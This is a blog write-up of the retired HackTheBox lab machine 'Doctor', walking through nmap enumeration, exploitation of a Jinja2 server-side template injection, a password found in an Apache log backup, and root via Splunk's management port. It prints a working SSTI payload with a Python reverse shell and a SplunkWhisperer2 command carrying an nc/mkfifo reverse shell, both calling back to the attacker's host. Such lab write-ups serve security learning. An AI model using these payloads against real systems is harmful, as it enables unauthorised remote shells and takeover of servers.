Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Doctor
|htbmachinesretired|

Summary

Doctor is a Linux, easy box is a created by egotisticalSW. Initial foothold was finding the the SSTI(Server side template injection) and using that to get a low privilege shell. User was finding the password for user in apache2 backup log. Rooting was exploiting Splunkd and getting root.

Initial Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Nmap 7.80 scan initiated Sun Sep 27 12:21:43 2020 as: nmap -sC -sV -oN nmap/doctor 10.10.10.209
Nmap scan report for doctors.htb (10.10.10.209)
Host is up (0.076s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http     Apache httpd 2.4.41 ((Ubuntu))
| http-server-header:
|   Apache/2.4.41 (Ubuntu)
|_  Werkzeug/1.0.1 Python/3.8.2
| http-title: Doctor Secure Messaging - Login
|_Requested resource was http://doctors.htb/login?next=%2F
8089/tcp open  ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after:  2023-09-06T15:57:27
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 27 12:22:31 2020 -- 1 IP address (1 host up) scanned in 48.30 seconds

WEB (IP)

Looking at the web we find a email as info@doctors.htb lets add that domain and visit the site again

WEB (doctors.htb)

We see a self registration page So lets self register ourselves and check the website

Which redirected me to /home

checking the New message show we can create new posts

Checking the comment on the page we find a beta /archive route

Trying SSTI on the post we find a template injection with {{4*4}}

and checking the `/archive` page we find that it work

and checking the cookie we see that it is probably python

so trying some ssti from payloadAllThings

1
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.24\",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %}

we get a shell as web

Web

Enumerating the box i saw a backup file in /var/log/apache2

and we find a password as Guitar123

Shaun

SU to shaun with Guitar123 we get a shell.

Enumerating the box we don’t see something interesting.

Going back the nmap scan we saw one more port open as 8089

Trying shaun creds we see we can use that

Googling for splunk exploit we see an MSF exploit

Trying that we can try that but that didn’t work for me.

Googling more we find splunkwhisper

We can get the shell using SplunkWhisperer2

Using

1
python PySplunkWhisperer2_remote.py --host 10.10.10.209 --port 8089 --lhost 10.10.14.24 --lport 9001  --payload "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 9002 >/tmp/f" --username shaun --password Guitar123

I had to fix the code a little to get it working had to change options.lport to int(options.lport)

Root

And we have rooted the box

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/doctor/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxmediumsstisplunkd